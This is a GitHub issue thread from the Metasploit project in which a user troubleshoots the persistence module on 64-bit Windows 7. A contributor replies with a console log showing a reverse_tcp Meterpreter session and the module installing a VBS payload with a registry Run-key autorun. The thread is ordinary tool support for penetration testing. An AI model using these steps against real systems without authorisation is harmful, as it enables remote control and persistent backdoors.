Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

persistence script vbs cannot run on x64? #6904

Closed
kdlsw opened this issue May 23, 2016 · 5 comments
Closed

persistence script vbs cannot run on x64? #6904

kdlsw opened this issue May 23, 2016 · 5 comments
Labels
bug payload

Comments

@kdlsw
Copy link

kdlsw commented May 23, 2016

Hello everyone,
With Kali, I just built an exe file with msfvenom, with payload windows/x64/meterpreter/reverse_tcp, and listen with multi/handler, the same payload, it all works fine, the target is a win7 x64 VPS.

The problem came when I tried to run persistence script, the target machine shows some VB warnings, briefly "the program is a 16 bit program, and the system is 64 bit, so it will stop, please contact the program supplier for a x64 edition", this the same massage appears when every time login too (I give the -X or -U flag).

I then tried this https://github.com/rapid7/metasploit-framework/blob/ee07809fd83f87d4cfc75525739820d1a87e2dfb/scripts/meterpreter/persistence.rb, result is the same.

I am not sure which part went wrong, please, any suggestion will be appreciated. Thank you!
@void-in
Copy link
Contributor

void-in commented May 23, 2016

Can you try modules/exploits/windows/local/persistence.rb? The meterpreter scripts are not managed any more.

@kdlsw
Copy link
Author

kdlsw commented May 23, 2016

Ok, I just tested it, there is the same error, after I click "OK" on the pop window, it shows another warning from windows script Host,
Script:
C:\Users\Administrator\AppData\Local\Temp\pkzsdfSFS.vbs
line: 21
character: 2
error: 0x800700D8
source: (null)

is there any succeed example command code? I am worrying if I did some misconfiguration.

@void-in
Copy link
Contributor

void-in commented May 24, 2016
edited

I couldn't reproduce this at my end. Target machine Windows 7, latest Metasploit git checkout:

msf exploit(handler) > exploit

[*] Started reverse TCP handler on x.x.x.x:443
[*] Starting the payload handler...
[*] Sending stage (1189423 bytes) to y.y.y.y
[*] Meterpreter session 1 opened (x.x.x.x:443 -> y.y.y.y:65197) at 2016-05-24 09:48:58 +0500

meterpreter > sysinfo
Computer        : TEST
OS              : Windows 7 (Build 7600).
Architecture    : x64
System Language : en_US
Domain          : MSF
Logged On Users : 1
Meterpreter     : x64/win64

meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use exploit/windows/local/persistence
msf exploit(persistence) > show options

Module options (exploit/windows/local/persistence):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DELAY     10               yes       Delay (in seconds) for persistent payload to keep reconnecting back.
   EXE_NAME                   no        The filename for the payload to be used on the target host (%RAND%.exe by default).
   PATH                       no        Path to write payload (%TEMP% by default).
   REG_NAME                   no        The name to call registry value for persistence on target host (%RAND% by default).
   SESSION                    yes       The session to run this module on.
   STARTUP   USER             yes       Startup type for the persistent payload. (Accepted: USER, SYSTEM)
   VBS_NAME                   no        The filename to use for the VBS persistent script on the target host (%RAND% by default).


Exploit target:

   Id  Name
   --  ----
   0   Windows


msf exploit(persistence) > set SESSION 1
SESSION => 1
msf exploit(persistence) > exploit

[*] Running persistent module against TEST via session ID: 1
[+] Persistent VBS script written on TEST to C:\Users\MSF\AppData\Local\Temp\ytHMQvsCXmUN.vbs
[*] Installing as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\xeIwIRsvhAkUN
[+] Installed autorun on TEST as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\xeIwIRsvhAkUN
[*] Clean up Meterpreter RC file: /root/.msf4/logs/persistence/TEST_20160524.4950/TEST_20160524.4950.rc
msf exploit(persistence) > sessions -i 1
[*] Starting interaction with 1...

msf exploit(persistence) >

@kdlsw
Copy link
Author

kdlsw commented May 25, 2016
edited

@void-in Thank you very much for testing it out, unfortunately I still cannot spot any problem on my end. If it is possible, do you mind to send me a copy of your peresitence.rb under your exploit/windows/local/ database please? cause all other steps seem identical, I modified my persistence.rb for a few times, then switched back to the original version, but cant be too sure about that. Lot of Thanks

@void-in
Copy link
Contributor

void-in commented May 25, 2016

I am using the one in the msf tree. You can examine it at https://github.com/rapid7/metasploit-framework/blob/05680ab6f30d6a8437ac1a8be6d9110764bbc725/modules/exploits/windows/local/persistence.rb

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
bug payload
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
4 participants
@void-in @bcook-r7 @kdlsw @ccondon-r7